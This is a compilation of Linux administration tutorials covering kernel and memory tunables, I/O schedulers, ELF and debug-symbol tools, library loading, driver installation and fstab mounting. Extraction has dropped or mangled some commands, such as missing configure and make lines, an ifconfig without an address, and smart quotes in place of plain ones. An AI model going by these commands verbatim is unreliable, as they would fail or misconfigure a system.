Oncer your system boots and you are 100% confident the change works well, then you can make the change permanent, either by editing the GRUB menu or by editing the driver to the /etc/modprobe.d/blacklist or /etc/modprobe.d/blacklist.conf file, depending on your distribution.

echo “driver name” >> /etc/modprobe.d/blacklist

Please make sure you have backups before you permanently alert your system. Finally, some drivers will have writable parameters exposed under /proc and /sys, allowing you to echo new values on the fly and make changes as necessary. We will discuss that a while later.

6. Browsing the kernel stuff

This is a vague title, but what I’m referring to is the capability to quickly inspect kernel functions, check header files, determine whether your applications are trying to run code that belongs to the kernel or something else and so forth. To this end, there are many tools you can use. We’ll examine a few.

First, you can go online lxr – The Linux Cross Reference site, which indexes all source code in the kernel repositories. So if you’re looking some function, just input the name or part thereof into the search box and start reading.

LXR site

Then, there’s cscope, which we saw in the Kernel Crash Book. If you have kernel sources installed on your machine, you will be able to check what functions, text strings, symbols and definitions are declared in different source files. This is quite useful if you are trying to debug problems with your applications or perhaps even kernel crashes. To that end, you might also be interested in ctags.


7. Some extras

The tips listed below will probably not serve you that often, but it is good to know about them. Almost like hoarding water for the nuclear winter, so to speak, only more fun. Now, please note that you cannot follow the advice below at all!

It’s a sort of a paradox, but unlike so many people out there, I will not give you blanket suggestions on how to utilize your machines, as every single use case is different. Saying that X will speed Y is utterly and morally wrong. One man’s tweak blessing is another’s curse. Do not even change configuration because someone somewhere said it ought to work, make your system work faster, be more responsive, etc. 99% of these wild and happy recommendations are valid for single home machines with no regard to reality, especially not businesses with heavily loaded production servers. Therefore, be aware of the possibilities, study them carefully and then apply your best formula.

/proc and /sys tunables

Explaining what /proc and /sys do is beyond the scope of this article by three whole quantum leaps. But they are very important pseudo-filesystems that let you tweak all kinds of things, on the fly, no reboot required.

In this section, I will try to elaborate on several useful features, like CPU affinity, memory tunables, scheduling, and a few other items that will normally earn you a good beating your neighbors if you ever speak of them in public. Let’s do it.

For example, if you have a multi-processor system that does very specific tasks, you might want to bypass the internal scheduling mechanisms and force your cores to process only certain workloads. Normally, this tradeoff usually has more problems than benefits, so please don’t make any changes just for the sake of being cool.

To give you a practical example, you might want to assign interrupt handling for most heavily used network channels to CPU1, while allowing the rest of the tasks to work on CPU2. Indeed, if you have a box that has several network devices and churns data like mad, loading one specific processor might be a good idea in ensuring the quality of service for other tasks. Then again, you could ruin everything, so be careful.

To get this going, you need the processor bitmask, which you can derive from the number of available processors on your box, as well as the corresponding interrupt for the channel you wish to assign to a specific processor.

cat /proc/cpuinfo

cat /proc/interrupts


And then, we do the magic – force IRQ 30 (Wireless, iwlagn) to processor 1:

echo 1 > /proc/irq/30/smp_affinity

Of course, your kernel must be capable of symmetric multi-processing, which is a default in all new kernels. It’s not a given for older kernels like 2.6.16 and 2.6.18 in previous but still much used enterprise editions of SUSE and RedHat.

More reading here:

Memory management

Linux memory management is the blackest of magics in the world. But it’s a fun thing, especially if you know what you’re doing. Like I mentioned before, no one setting will work for everyone. There’s no golden rule. The system defaults are as good as empirically possible for the widest range of uses, so you should stick with that.

If however, you feel really adventurous, you might want to explore the kernel tunables under /proc/sys/vm. There are several of those.

The swappiness parameter tells you how aggressively your system will try to swap pages. The values range from 0 to 100. In most cases, your disk will always be the bottleneck, so it will make little difference. Then, there’s the dirty_ratio tunable, which tells the percentage of total system memory that can be taken by dirty pages. Once this limit is hit, the system will start flushing data to the disk. Another parameter that is closely related to the dirty_ratio is dirty_expire_centisecs, which determines the max. age of dirty pages before they are flushed. The system will commit the dirty data based on the first of the two parameters to be met, which will most likely be the expire time.

Centisecs value

A mental exercise: the default dirty_ratio on Linux is 40%, while the default expire tunable is set to 3000 centiseconds. A centisecond is 1/100 of a second or 10ms, so we have 30 seconds total. If you have a machine with 4GB RAM, then 1.6GB will be dedicated to dirty pages at most. Now, this means that whatever you’re writing, it needs to create some 55MB of data every second to exceed this threshold in the thirty-second period for the kernel flushing thread to wake and start writing to the disk. In most cases, you will rarely have such aggressive writes. Some notable examples include large copies, video rendering and alike. In daily use, hardly ever. If you have more than 4GB RAM, say 8-16GB, then this becomes even less likely.

This exercise also tells you whether you really need that high dirty_ratio, how to set the other tunables and more. Having too many dirty pages also means very long and sustained writes when the time comes to commit them to disk. Food for thought, fellas. There’s no golden rule.

As you can see, I’m breezing through these extremely lengthy and complex topics, but the idea is not to write a PhD on memory management, but give you a very brief sampling of the possibilities, so you can later explore and use them.

You can make changes by echoing values to /proc or using sysctl.

A very geeky read (direct link) for RHEL4, but still very much relevant today.

Another thing you may want to attempt is to allow/disallow memory overcommitment. Normally, Linux uses smart heuristics for managing overcommittment, but if you are really worried about how your system handles out its quiche to processes, then you can disable the overcommittment or set a ratio. I would recommend against any changes, unless you have very strict requirements, you cannot afford OOM mechanism to work, etc.

I/O scheduling

Another geeky item, best left alone. But if you must, please read on. First of all, most I/O elevator algorithms assume platter-based disks, so if you’re running with SSD, the rules of the game changes, but this has been taken into account in recent kernels. Assuming you’re running on plain old mechanical hardware, then you have one simple goal: as few seeks as possible to minimize access times and wear, which translate into user responsiveness latency. But then, some of your machines might be running pure computation tasks, so the responsiveness might not be an issue.

But in general, we want to perform write operations in bursts, as much data as possible. There are four available schedulers: noop – most basic, dispatches requests as they come, normally good for disks on key and systems with heavy CPU usage; anticipatory – longer delays, so there’s more chance for starvation, however it tries to maximize throughput and reduce seeks; cfq – better known as completely fair queue scheduler, it relies on processes behavior and can be used with ionice to achieve balanced throughputs. It does not prefer writes or reads; deadline – this one tries to dispatch as quickly as possible, treating tasks as real-time, in order to avoid process starvation.

You can issue the change per disk:

echo <scheduler> > /sys/block/<device>/queue/scheduler

For instance:

echo cfq > /sys/block/sdb/queue/scheduler

All this sounds dandy, but the real challenge is figuring out what your machines are doing and match the behavior accordingly. After you have made the change, you will need to test your results. In the Linux world, you will most commonly find cfq or anticipatory as the default choice.

Of course, if you make changes to the scheduler, then you might also want to tweak the readahead settings, both the readahead max. value and the throughput value, as well as the number of simultaneous I/O requests. The corresponding tunables include nr_requests, read_ahead_kb and inode_readahead_blks. Some of the values will be limited by the filesystem choice. Let me disappoint you and tell you that you will have to work hard to see significant improvements.

Some reading on schedulers: Linux Journal – I/O Schedulers.

Filesystem mount options

Like the disk, we want speed. That’s the basic driver here. So let’s see what kind of options we can use. The most notable focus is on the journaling capabilities of modern filesystems.

This is another black magic, but something you can test with relative safety. Choose any old disk, preferably with a single partition to avoid masking results by typical disk speed bottlenecks. Then, test various mount options. Some of the notable performance boosters so to speak include:

writeback mode – only the metadata is journaled, and the data blocks are written directly to their location on the disk. This preserves the filesystem structure and avoids corruption, but data corruption can occur. For example, if the system crashes after the metadata is journaled but before the data block is written.

ordered mode – metadata journaling is done after the data is written to the disk. In this way, data and filesystem are guaranteed consistent after a recovery.

data mode – both metadata and data are journaled. This mode offers the greatest protection against file system corruption and data loss but can suffer from performance degradation, as all data is written twice (first to the journal, then to the disk).

Some more reading: Anatomy of Linux journaling filesystems.

All right, now that we know what we need, we can simply mount a filesystem with the  writeback option. You should test extensively, to make sure things work out find, or at the very least, use this option for filesystems with heavy access but that might not be containing critical data.

mount -o data=writeback /dev/<device>  /<mountpoint>

You might also want to consider noatime and nodiratime, but again don’t listen to one geek trying to impress you with words, do your own testing and prove everyone else wrong.

And I guess that would be enough for today. Other items that you might want to look at include slabinfo/slabtop, huge pages and Table Lookaside Buffers (TLB). That’s different from LTB, which stands for Tomato Lettuce and Bacon, a different kind of hack. Some screenshots and we’re done here.

slabinfo, slabtop

Huge pages config


There you go, another lovely set of geekiness. Again, the real value in these hacks is the exposure not the actual application. Be aware of the functionality, study it, and then apply it to your personal or business needs one day. And remember that no two computers and use cases are the same, so blind copy & paste will not work.

That would be all, I guess. You are also welcome to check the first and the second article, as well as the whole series of so-called super-duper admin tools. We will also have an extensive review on the Gnu Debugger (gdb) soon. Stay pretty.

Once article numbers start to run high, people tend to start paying less attention to the content. However, by no means does that make this article any less useful or interesting. I happen to have a fresh new bunch of tips and tricks that ought to increase your Linux street credit.

In the first two parts, we focused on system administration mostly. The third part focused on system internals. This fourth chapter will elaborate on compilation and fiddling with Linux binaries, specifically the ELF format. Again, not everyone’s lunch or dinner, but some of you may appreciate the extra geekiness I devoted to making your lives easier. So please follow me.


1. Learn more about the file – no strings attached

Say you have a binary of some sort – a utility, a shared object, a kernel module, maybe even an entire kernel. Now, using file will give some very basic information on what kind of object you’re dealing with. But there’s more. Strings. Now, the subtitle makes a lot of punny sense, hihihihihihi.

Strings is a very useful command that can pull out all printable characters out of binary files. This can be quite useful if you need to know the would-be meta data, like compiler versions, compilation options, author, etc. For example, here’s what it looks like for a kernel vmlinuz file. Some of you may actually recognize some of the print messages there.


2. Debugging symbols

Now, say you wish to debug your faulty application, but for some reason all of the functions in the backtrace come out with ?? marks. The simple reason is that you may not have debug symbols installed. But how would you know?

Well, apart from checking the installed database of RPM of DEB files, you may want to query the files directly. Again, we will use the file command, and then delve deeper into the system. Here’s an example:

Stripped object

What we see here is that we have a 32-bit Little Endian shared object for the Intel architecture, stripped of symbols. That’s what the last word tell us. This means the binary was compiled without symbols or they have been removed afterward to conserve space and improve performance. We discussed symbols in the Kernel Crash book, too.

So how do you go about having or not having debug symbols? Another highly useful tool that should let you get binary symbols is nm. This tool is specifically designed to get symbols from various sections in the executable file format that is typical on Linux.

For instance, -b flag lets you get symbols for uninitialized global variables in the data section, also known as bss. -C lets you query common symbols, or rather uninitialized data. In our example, there are none available, because our shared library is stripped.

nm example

However, if you query with -D flag, you will get symbols in the initialized data section.

Global table

For most people, this information is completely useless. But for senior system admins and software developers, knowing exactly the mapping of code in a binary and translation of memory addresses to function names is essential.

Playing with symbols – objdump, objcopy, readelf

We can add and remove them, as we please, after the compilation. To that end, we will use several handy utilities, including objcopy and readelf. The first allows manipulating object files. The second lets you read data from binary files in a structured human readable format.

We will begin with readelf. The simplest way is to dump everything. This can be done using -a flag, but beware the torrents of information, which probably won’t mean much to anyone but developers and hackers. Still good to know and impress girls.

readelf, all

Another useful flag is –debug-dump=info. You might be interested in debuginfo only. Here, specifically, we compile our test tool with debug symbols, and then display the info. Please note that we have a lot of information here:

Debuginfo not stripped

Now, objcopy can manipulate files so that above information is shown, not shown or used elsewhere. For instance, you might want to compile a binary with debug symbols for testing purposes, but distribute a stripped version to your customers. Let’s see a few practical use cases.

To remove debug info from the original binary:

objcopy –strip-debug foo

This will result in a stripped binary, just like we saw earlier. But then, you might not want to toss away those symbols permanently. To that end, you can extract debug info and keep it into separate file:

objcopy –only-keep-debug foo foo.dbg

And then, you can link debug info back to the stripped binary when you need it:

objcopy –add-gnu-debuglink=foo.dbg foo

On the far end of the spectrum, we get objdump, another handy utility. Again, we used the program before, when playing with kernel crashes, so we are no strangers to its power and functionality. Similar to readelf, objdump let us obtain information from object files. For example, you may be interested in the comment section of your binary:

objdump, comments

Or you may want everything:


Combined example

Now, let’s see this in practice. First, we compile our code with -g flag. The binary weighs some 18299 bytes. Then, we strip debug information using objcopy. The resulting binary is now much smaller, at 13042 bytes. And readelf shows nothing, unlike before.

Remove symbols

3. Compilation optimization tips

When compiling your code, there are a billion flags you can use to make you code more efficient, leaner, more compact, easier to debug, or something else entirely. What I want to focus on here is the optimization during the compilation. GCC, which can be considered a de-facto compiler on pretty much any Linux, has the ability to optimize your code. Quoting from the original website:

Without any optimization option, the compiler’s goal is to reduce the cost of compilation and to make debugging produce the expected results. Statements are independent; if you stop the program with a breakpoint, you can then assign a new value to any variable or change the program counter to any other statement in the function and get exactly the results you would expect from the source code. Turning on optimization flags makes the compiler attempt to improve the performance and/or code size at the expense of compilation time and possibly the ability to debug the program.

In other words, the compiler can perform optimizations based on the knowledge it has of the program. This is done by intermixing your C language with Assembly in numerous ways. For example, simple arithmetic procedures of constant values can be skipped altogether and the final results returned, saving time.

Optimizations can affect binary file size and its speed or both. At the same time, it will be much harder to debug, because some of the instructions may be omitted. Moreover, the compilation time will probably be longer. Overall, -O2 levels offers a good compromise between user’s ability to debug, size and performance. It is also possible to recompile code with -O0 level for debugging purposes only and ship to customers with the lean image.

GCC optimization

Here’s another interesting article on optimizations.

4. LDD (List Dynamic Dependencies)

When you try to run your applications, they may sometimes refuse to start, complaining about missing libraries. This can happen for several reasons, including permissions, badly configured path or an actual missing library. To be to know exactly what’s going on, there’s a neat little utility called LDD. It allows you to print shared library dependencies for your binaries. You should use it.



As I’ve mentioned just moments earlier, the system path can impact the successful startup of applications. For example, you may have several libraries under /opt, but /opt is not defined in the search path, which may only include /lib and /lib64, for instance. When you try to fire up your program, it will fail, not having found the libraries, even though they are physically there. You can work around this issue without copying files around by initializing environment variables that will tell the system where to look.

The word system sounds almighty here, so perhaps a short introduction in how things work might be in order. In Linux, there’s the super-tool called dynamic linker/loader, which does the task of finding and loading libraries for programs to run. is a smart and efficient tool, so it does not perform a full-system search every time it needs to fire up a binary. Instead, it has its own mini-database, stored under /etc/, which contains a compiled list of search libraries and an ordered list of candidate libraries. It’s somewhat similar to the locate program.

This list is updated by running ldconfig, which most Linux systems execute either during startup or shutdown, but it can be manually run whenever the /etc/ file, which contains the list of search libraries, is updated. This also happens after installations of software.

If the linker cannot find libraries, the loading of the program will fail. And you can use LDD to see exactly what gives. Then, you can use the environment variables LD_PRELOAD and LD_LIBRARY_PATH to force loading of libraries outside the search path.

There is some difference between the two. LD_PRELOAD will force loading of these libraries before any other. LD_LIBRARY_PATH is similar to standard PATH. There are many other variables you can change, but that’s what the man page is for.

One last hack that you might be interested in is rpath. It allows hard-coding runtime search paths directly into the executable, which might be necessary if you’re using several versions of the same shared library, for instance.

Recursive implementation

LDD displays only unique values. But you might be interested in a recursive implementation. To that end, you might want to check the Recursive LDD tool, available for download at It’s a simple Perl script, with some nice tweaks and options. Quite useful for debugging software problems.

Recursive LDD

5. Some more gdb tips

We learned a lot about gdb. Now, let’s learn some more. Specifically, I want to talk to you about the Text User Interface (TUI) functionality. What you want to do is fire up the venerable debugger with -tui option. Then, you will have a sort of a split-screen view of both your code and the gdb prompt, allowing you to debug with higher visual clarity. All the usual tricks still apply.

GDB -tui

You might also be interested in this article.

6. Other tips

The one last extra tip is about translating addresses into file names and line numbers. addr2line translates addresses into file names and line numbers. Given an address in an executable or an offset in a section of a relocatable object, it uses the debugging information to figure out which file name and line number are associated with it.

addr2line <addr> -e <executable>

A geeky example; say you have a misbehaving program. And then you run it under a debugger and get a backtrace. Now, let’s assume we have a problematic frame:

# C  []  gzdirect+0x28

All right, so we translate (-e tells us the name of the object). Works both ways. You can translate from offsets to functions and line numbers and vice versa. Again, this can be quite handy for debugging, but you must be familiar with the application and its source.

addr2line 0xa910 -e

addr2line -f -e 0xa910
gzdirect  ? function name

More reading

You might also want to check these:

Linux super-duper admin tools: strace and lsof

Linux system debugging super tutorial

Highly useful Linux commands & configurations


I assume this article is only for the brave, bold and beautiful. It’s definitely not something the absolute majority of you will ever want, need, see, try, require, or anything of that sort. But then, if you’re after impressing girls, there’s no better way of doing it.

Along that noble cause, this tutorial also presents some handy tips for software development and debugging, which, combined with a deep understanding of system internals and wise use of tools like strace, lsof, gdb, and others, can provide an awesome wealth of useful information. We learned how to read and extract information from files, how to work with symbols, how to read the binary format, compilation tips, dynamic dependencies, and several other tweaks and hacks. That should keep you busy for a week or there until you figure out everything. Meanwhile, do send me any ideas you may have on similar topics, if you feel there ought to be a tutorial out there. And see you around.

Highly Useful Linux Commands & Configurations

Oh, you’re gonna love this article! Even though there are many websites hawking similar content, with varying degree of clarity and quality, I want to offer a short, easy-to-use guide to some of the most common yet highly useful commands that could help make your Linux experience more joyful.

Now that you have read some of my installation guides, you have probably setup your system and configured the basic settings. However, I’m positive that some of you must have encountered certain difficulties – a missing package, a missing driver. The initial effort required of a Linux novice can appear daunting, especially after many years of Windows discipline.

Therefore, this article was born, in order to offer simple solutions to some of the more widespread problems that one might face during and immediately after a Linux installation. It is intended for the beginner and intermediate users, who still feel slightly uncomfortable with meddling in command line, scripts or configuration files.

This article will refer to Ubuntu Linux distribution as the demonstration platform. However, all of these commands will work well with many other Linux distributions, with only small changes in syntax, at most. I have personally tested and used all of the commands and configurations in both Debian-based and RedHat-based distributions with success.

What am I going to write about?

Here are the topics. If you want to skip through some of the paragraphs, you can use the table of contents further below, but I recommend you read everything.

  • Basic tips – avoiding classic mistakes.
  • Commands – an introduction to the command line.
  • Installation of software – including extraction of archives and compilation of sources.
  • Installation of drivers – including compilation, loading, configuration, and addition of drivers to the bootup chain, writing of scripts and addition to the bootup chain.
  • Mounting of drives – including NTFS and FAT32 filesystems and read/write permissions.
  • Installation of graphic card drivers – including troubleshooting of stubborn common problems.
  • Network sharing – how to access shared folders in Windows and Linux from one another.
  • Printer sharing – how to share printers in Windows and Linux from one another.
  • Some other useful commands.

Table of contents

  1. Basic tips
  2. Commands
    1. Asking for help
  3. Installation of software
    1. What should you choose?
    2. Discipline
    3. Unpacking an archive
    4. Zipped archives
    5. Installation
    6. Compilation (from sources)
    7. Summary of installation procedures
  4. Installation of drivers
    1. Installation
    2. Loading drivers
    3. Configuration of drivers
    4. Scripts
  5. Mounting a drive
    1. Other options
  6. Installation of graphic card drivers
  7. Network sharing
    1. Windows > Linux
    2. Linux > Windows
  8. Printer sharing
  9. Other useful commands
    1. Switching between runlevels
    2. Backing up the X Windows configuration file (useful before graphic drivers update)
    3. Display system environment information
    4. Listing information about files and folders
    5. Kill a process

Basic tips

There are some things you need to know before heading into the deep waters of the Command Line:

  • Linux commands are cAse-sensitive (dedoimedo and Dedoimedo are two different files).
  • It is best to create folders and files in Linux WITHOUT spaces. For example: Red Gemini.doc is a valid Windows filename, but you might have problems accessing it from the command line in Linux; you should rename the file to RedGemini.doc. Users of the DOS command line are also familiar with this problem – commands will fail on folders and files with more than a single word, unless explicitly declared with double quotation marks (“like this”).
  • Pressing TAB when typing a command will auto-complete the command. For example: if you have a single file in a certain folder that begins with the letter p, typing p then TAB will automatically complete the name regardless of its length; if you have more than one file, the command will complete the maximum available part of the string that matches all relevant filenames (s + TAB for smirk and smile will auto-complete to smi).
  • Before copying, moving, deleting, or tweaking any file, especially scripts and configuration files, it is best to back them up first.
  • Do NOT stop the commands while they are running (by pressing Ctrl + C). Even though you may not see the HDD light blinking and the execution takes a very long time, do not assume the system is frozen. Unlike Windows, Linux almost never gets stuck. Let the command complete, be it 5 seconds or 5 hours. Just for reference, compilation of certain programs can take a few days to complete.


To be able to use the command line, you need to be familiar with some rudimentary Linux commands. Former users of DOS will find the transition very simple. Below you can find links to some of the basic Linux commands:

Alphabetic Directory of Linux Commands

An A-Z Index of the Linux BASH command line

Some Useful Linux Commands

Asking for help

First, anything and everything you could ever probably think of has already been answered at least once in a Linux forum; use the forums to find solutions to … everything. Copy & paste your error code / message into a search engine of your choosing (e.g. Google) and you will find links to answers in 99.9996532% of cases.

Locally, help is one of the most useful features available to the command line user. If, for some reason, you cannot figure out the syntax required to use the file, you can ask for help. There are two ways of doing it:

man some_command

The above usage will display a full help file for the command in question in Vi text editor. You can learn more about Vi from An Extremely Quick and Simple Introduction to the Vi Text Editor.

some_command –help

The above usage will display a summary of available options for the command in question, inside the command line terminal. You will most likely prefer to use this second way.

Installation of software

Although most Linux distributions offer a wealth of useful programs, you will probably be compelled to try new products. Some programs will be available for download via package managers, like Synaptic. Others will only be found on the developer’s site, most likely packaged inside an archive.

You probably ask yourself: What now? The answer is very simple. There are three versions to your downloads, from the easiest to hardest:

  1. Compiled packages, usually with .rpm or .deb extension. These packages are identical to Windows .exe installers and will unpack and install automatically. The upside of the packages is the relative use of their deployment; the downside is that the user has no control over the installation script.
  2. Compiled archives, called tarballs, with .tar extension. These archives will contain all of the necessary files required to make a program run, but the user will have to install them manually, from the command line, after unpacking the archive. These archives will also most likely be compressed and bear a double extension like tar.gz or tar.bz2. This option offers more control during the installation.
  3. Sources, usually archived. The user will have to unpack the archives and then compile the sources before being able to actually install the program. In addition to better control of the installation, the user will also benefit from software optimized to his hardware configuration.

What should you choose?

The logical choice for the novice user should be 1 > 2 > 3. Intermediate users will probably try 2 > 3. Geeks will most likely ever only compile from sources.


This may sound harsh or strict, but certain unspoken rules are followed, which simplifies the use of software downloads.

  • The program itself will almost always be accompanied with a how-to, usually in a form of a text file that explains what a user should do, prior, during and after the installation. The how-tos are most often found on the site you download the software from, either as a standalone file, an explanatory text on the download page or bundled with the download.
  • You should read this how-to FIRST before downloading / manipulating the software.
  • A secondary how-to will most often be packed with the program, explaining the installation process itself.
  • You should read this how-to FIRST before installing the software.

Unpacking an archive

The exact syntax will differ from one package to another. But the general idea is the same for all. The only difference will be in the arguments used for unpacking. Here are a few common examples:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

You can read in detail about the handling of tarballs on the Wikipedia site.

Zipped archives

Some archives will be zipped rather than tarred. This might put you off. But the problem is easily solvable. If you recall, we have the ability to “ask” for help for each unknown command. In our case, we need to know how to unzip an archive.

unzip –help

Here’s a screenshot I took, depicting the very dilemma we are facing – and its solution:

Linux commands - unzip

A possible usage will then be:

unzip -d /tmp

Reading from the help screen above, we want to unpack our archive into a folder. The argument -d tells us that the contents of the archive will be extracted into a destination directory (folder), in our case a temporary folder called /tmp.


After unpacking the archive, you will now have to install the software. Usually, the installation is invoked by using a script. The exact name of the script will vary from one program to another, as well as its extension, depending on the language used to write it.

For example, the following command will invoke the script named (written in Perl). Dot and trailing slash indicate that the script will be executed within the current directory.


Compilation (from sources)

Sometimes, the programs will not be compiled and ready to install. The archives will contain lots of files with curious extensions like .c, .h and .o. If you are not a programmer, you should not bother understanding what they are and what they do. Likewise, you need not understand how the compilation of sources is made. You just need to remember three simple commands:

This first command will generates files required to build the software and setup system-wide parameters.


This second command will build the libraries and applications.


This third command will install the libraries and applications.

make install

For homework, you could use some reading:

Compiling and installing software from source in Linux

There is no guarantee that the compilation will succeed. Some sources are broken! In that case, you should make note of the errors and post them in relevant forums, where you are most likely to find an answer rather quickly.

Summary of installation procedures

To make things easier to understand, below are two examples showing the list of necessary commands required to run to successfully install a downloaded application (please note these are ONLY examples!). Most likely, you will need root privileges (su or sudo) to be able to install software. An archive containing compiled program:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory

An archive containing sources:

tar zxf some_software.tar.gz
tar -xjf some_software.tar.bz2

cd some_software_directory
make install

Installation of drivers

Drivers are programs, like any software. The only difference is – you do not actively use them. They serve the purpose of making your hardware components understand each other. As simple as that. You need them to enhance your usage of the operating system.

Most often, the necessary drivers will be included with the distribution and installed during the setup. Sometimes, you might not be so lucky and will reach a newly installed desktop without sound, network or video drivers.

I will not go into details explaining how specific drivers are installed. You should contact your vendors for that information. I will explain how to install the drivers, how to load them, and then how to add them to startup, so they will load automatically every time your machine starts.


Just like any software, drivers may be compiled or not. Most often, they will not be. Drivers will usually be distributed as sources, in order to achieve maximal possible compatibility with the hardware on the installation platform. This means you will have to compile from sources. Piece of cake. We already know how to do that.

If the vendor is benevolent, it is possible that the driver will be accompanied with a self-installation script. In other words, you will need to run only one command, which will in turn extract the archive, compile, install, and load it. But this might not be the case – or might not even work. I have personally witnessed a driver self-installation script go wrong. Therefore, for all practical purposes, you should probably manually install the driver.

After successfully extracting the archive and compiling the sources (./configure, make, make install), you will most likely be faced with three choices:

  • The driver will be fully configured and copied to default directories and the system paths updated. You will not need do anything special to use the driver.
  • The driver will be auto-configured and the system paths updated. This means you will only have to add the driver name to the list of drivers loaded during the boot to enable it every time the machine starts.
  • The driver will be ready to use, but will not be configured nor system paths updated. You will have to manually load the driver and then update the list of drivers loaded during the boot to enable it every time the machine starts.

The second option will make the installation process probably look like this:

tar zxf some_driver.tar.gz
tar -xjf some_driver.tar.bz2

cd some_driver_directory
make install



All that remains is to add this driver to the list of drivers loaded at bootup. In Linux, the drivers are often referred to as modules.

You need to open the configuration file containing the list of modules. You should refer to your specific distribution for exact name and location of this file. In Ubuntu, the file is called modules.conf and is found in /etcdirectory (/etc/modules.conf). We will update this file, but first we will back it up! Please remember that you need root privileges to meddle with the configuration files.

This is what our procedure would look like:

cp /etc/modules.conf /etc/modules.conf.bak
gedit /etc/modules.conf

The above commands will open the file modules.conf inside the gedit text editor. Simply add your driver in an empty line below the existing drivers, save the file, exit the text editor, and reboot for the change to take effect. That’s all!

Here’s an example of a modules.conf file for a Kubuntu Linux, installed as a virtual machine. To add a new driver, we would simply write its name below the existing entries. Of course, you need to know the EXACT name of the driver in question.

Linux commands - modules.conf

The third option is a bit more complex.

Loading drivers

You have successfully compiled the driver, but nothing has happened yet. This is because the driver is not yet enabled. Looking inside the directory, you will notice a file with .ko extension. This is your driver and you need to manually load it.

We need to install the driver into the kernel. This can be done using the insmod command.

cd driver_directory
insmod driver.ko

After the driver is loaded, it can be configured. To verify that the driver is indeed present, you can list all the available modules:


If by some chance you have made a terrible mistake and you wish to remove the driver, you can use thermmod command:


Configuration of drivers

Configuring the driver requires a bit of knowledge into its functionality. Most often, instructions will be included in the how-to text files.

Below, the example demonstrates how the network card is configured after the network driver is loaded. The network card is assigned an identifier and an IP address. In this particular case, eth0 was the selected device name, although it could be also eth1, eth2 or any the name. The assigned IP address tells us the machine will be part of a LAN network.

ifconfig eth0

After a reboot, you will realize that you no longer enjoy a network connection. This is because your driver has not been created in a common default directory and the system does not know where to look for it. You will have to repeat the entire procedure again:

cd driver_directory
insmod driver.ko
ifconfig eth0

You now realize that an automated script would be an excellent idea for solving this problem. This is exactly what we’re going to do – write a script and add it to bootup.


Like in DOS and Windows, scripts can be written in any text editor. However, special changes are needed to separate between text files and scripts. In the Windows department, simply renaming the .txt extension to .bat will convert the file to a script. In Linux, things are a bit different.

Linux command line lives inside a shell – or more precisely Shell. There are several Shells, each with a unique set of commands. The most common (and default) Linux Shell is the BASH. We need to add this information to our script, if we wish to make it communicate with our Shell. Therefore, the above commands + Shell addition will make the following script:


cd driver_directory
insmod driver.ko
ifconfig eth0

We can also make it shorter:


insmod /home/roger/driver_directory/driver.ko
ifconfig eth0

Now, we have a script. Or rather a text file that contains the relevant commands. We need to make it into an executable file. First, we need to save the file. Let’s call it network_script. To make the script executable:

chmod +x network_script

Now we have a real script. We need to place it in the /etc/init.d directory so that it will be run during bootup.

cp network_script /etc/init.d/

And finally, we need to update the system, so it will take our script into consideration.

update-rc.d network_script defaults

After you reboot, you will realize that your driver loads automatically and that your network card is configured! Alternatively, it is possible that the make install of the driver will place in the default directory:

/lib/modules/<KERNEL VERSION>/kernel/drivers/net/driver.ko

Or you could place the driver in this directory by yourself. This way, you will be able to avoid the step of writing the script. However, my method, even if not the most elegant one, has one advantage: Drivers that you have manually compiled and placed into the default directories will be lost every time you update the kernel. This means you will have to reinstall them again after every such update. My method un-elegantly escapes this problem.

Mounting a drive

If you run a dual-boot system, it is entirely possible that you have installed your Linux before you have formatted all the Windows drives. This means that some of these drives might not be mounted – or accessible – when you’re booted in Linux. Alternatively, you might have formatted the drives, but you have resized and relettered and renamed the partitions and they are no longer recognized by Linux. Furthermore, you just might be unlucky and your Linux refuses to see the drives despite your best efforts. Finally, you might be able to see them, but you cannot write to the NTFS drives and this irks you so. Compared to the above tasks, mounting drives is a simple job.

To be able to do this correctly, you need to know how your drives are ordered and what they are called, both in Windows and Linux. This requires that you be able to correlate between Windows partitions (E:\, G:\, K:\ etc.) and Linux partitions (hda1, hda4, hdb2 etc.).

First, make sure you know the order of your partitions in Windows. Then, when booted in Linux, list the Partition Tables:

fdisk -l

The above command will display all the available partitions on your system. In this example, you see only the Linux partitions present, but there might be other (Windows) partitions.

Linux commands - fdisk

For the sake of this exercise, let’s assume that Linux partitions are hda4-6, while Windows partitions are hda1-3.


  • hda1 will be Windows C:\ drive.
  • hda2 will be Windows F:\ drive – also called Data.
  • hda3 will be Windows G:\ drive – also called Games.
  • hda4 will be Linux swap / Solaris.
  • hda5 will be Linux (your /root).
  • hda6 will be Linux (your /home).

Now, before you mount a drive, you need to create a mount point. This is most conveniently done by assigned a directory within the /media directory. For example:

mkdir /media/data

The name data is arbitrary, but it can help relate the mounted drive to its Windows designation. Now, we need to mount the drive that corresponds to data. In our case, this is hda2.

There are several ways of mounting the drive. By default, NTFS partitions are mounted as read-only, although write access can also be enabled. FAT32 partitions are writable by default.

Like before, mounting the drive only once will hold valid for the current session. After reboot, the changes will be lost. Therefore, we need to add the mounting of the relevant partitions to the boot chain. The configuration file that holds this crucial information is called fstab and is located under /etc (/etc/fstab).

Therefore, in order to mount the NTFS drive (Windows F:\ drive called data) as read-only we need to:

  • Create a directory called data within /media.
  • Backup fstab.
  • Add a new line to the fstab file – that will mount the NTFS drive hda2 (Windows F:\data) as read-only.
mkdir /media/data
cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab

After opening the file in the text editor, we need to add the mount command. NTFS read-only:

/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0

The necessary commands, as well as procedures are well-documented in the Unofficial Ubuntu 6.10 (Edgy Eft) Starter Guide. Here, you can see the sample fstab file inside Kate text editor, for Kubuntu Linux.

Linux commands - fstab

Other options

Alternatively, if you have partitions formatted with FAT32 file system or you wish to be able to write to NTFS partitions from within Linux, you can use the following commands:

FAT32 read/write:

/dev/hda2 /media/data vfat iocharset=utf8,umask=000 0 0

NTFS read/write – requires installation of software that can write to NTFS drives.

apt-get install ntfs-3g
/dev/hda1 /media/data ntfs-3g defaults,locale=en_US.utf8 0 0

An exercise: Let’s assume we wish to be able to write to NTFS partition C, read-only NTFS partition F and use FAT32 partition G. In that case, the list of commands that we need to execute is:

apt-get install ntfs-3g

mkdir /media/windows
mkdir /media/data
mkdir /media/games

cp /etc/fstab /etc/fstab.bak
gedit /etc/fstab


/dev/hda1 /media/windows ntfs-3g defaults,locale=en_US.utf8 0 0
/dev/hda2 /media/data ntfs nls=utf8,umask=0222 0 0
